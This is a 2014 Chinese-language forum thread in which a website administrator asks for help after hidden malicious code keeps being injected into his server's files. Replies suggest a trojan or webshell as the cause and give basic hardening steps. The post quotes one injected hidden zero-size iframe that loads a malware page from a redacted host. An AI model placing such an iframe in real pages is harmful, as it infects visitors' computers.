日期:2014-05-17  浏览次数:20796 次

有关网站服务器的安全问题,高分求助!
网站服务器,WIN2000SERVER,SQL2000SP4,江民杀毒2006,网站工作组和服务器同在一个局域网中,服务器网站文件目录共享,没有安装防火墙。

最近一个月常发现网站目录中的文件被注入恶意代码,都是病毒链接,访问我的网页就会被个人电脑的杀毒软件发现并杀掉,代码类似于这种: <iframe   src= "http://www.#######.com/sd/vote/xin/he1p.html "   width= "0 "   height= "0 "   frameborder= "0 "> </iframe> ,我把网站的主要ASP文件设为只读,这样也不能防止他们改写文件,更有甚者,他们修改了文件的属性,把本该可读写的文件设成了只读。

我安装了江民的个人防火墙,可是不能用,运行一两个小时后就会使网站访问速度很慢。慎重起见我在我自己的电脑(WIN2000)上安装了黑冰服务器版(网上下的破解版),可是运行不起来,启动后半分钟就自动关闭了。

我想请问:
1、是不是黑冰和江民有冲突不能共处,我的黑冰怎么运行不了呢?
2、这样的恶意修改网站文件,是病毒还是黑客攻击呢?
3、如果安装了防火墙,我该打开哪些端口?需要的功能如下:
开放式网站的正常访问(包括OBLOG、论坛等)、局域网文件共享、局域网SQL的连接、JMAIL、网站提供少量的压缩文件下载,PCANYWHERE连接、博客用户可以上传一些图片和WORD文档等。

谢谢高手,分不够可以再开帖送分!!!

------解决方案--------------------
1、是不是黑冰和江民有冲突不能共处,我的黑冰怎么运行不了呢?
----------------------------------
装一个isa吧 功能强一点
2、这样的恶意修改网站文件,是病毒还是黑客攻击呢?
------------------------------------------------
木马
3、开放式网站的正常访问(80)、局域网文件共享 (135.139.445)局域网SQL的连接(1433)

多找些资料看看 慢慢就提高了

------解决方案--------------------
从症状看来,应该是通过木马控制的
你可以先重查杀木马入手
黑客应该是通过代码漏洞先获得webshell,然后植入木马的
另外,江民的墙据说不怎么样的
------解决方案--------------------
可能是网站代码有漏洞,把你的网站代码按日期排列,找到最近被修改过的代码,仔细的研究一下,找出漏洞补上
------解决方案--------------------
WIN2000SERVER能不能直接安装6。0
-----------------------------------------
不可以的

可以考虑就此机会用2003
------解决方案--------------------
网站的主站是我们自己开发的,有的栏目用.asp,有的是用的.net,还有博客和论坛用的程序都是从网上下的,一共有四种不同的程序,但都被改写过!
-----------------------------------------
服务器上还有其他网站没?有可能旁注攻击


关键不是5.0还是6.0,设置安全才是最主要的

硬件防火墙。。。又不是DDOS,没必要。代价太高,找专业人员帮忙设置下

看看是不是网站本身的漏洞,还是服务器,还是一些没用的组件。。。
------解决方案--------------------
给你一点建议:

1:开始的FTP不要直接到网站目录。二是传到另一个分区,然后转移到网站目录。

2:网站的IIS不要开启写入选项。

3:根据网站运行情况,一个文件夹一个文件夹的设置NTFS权限。

4:网站程序最好从新一个一个检查一遍。

希望对你有用。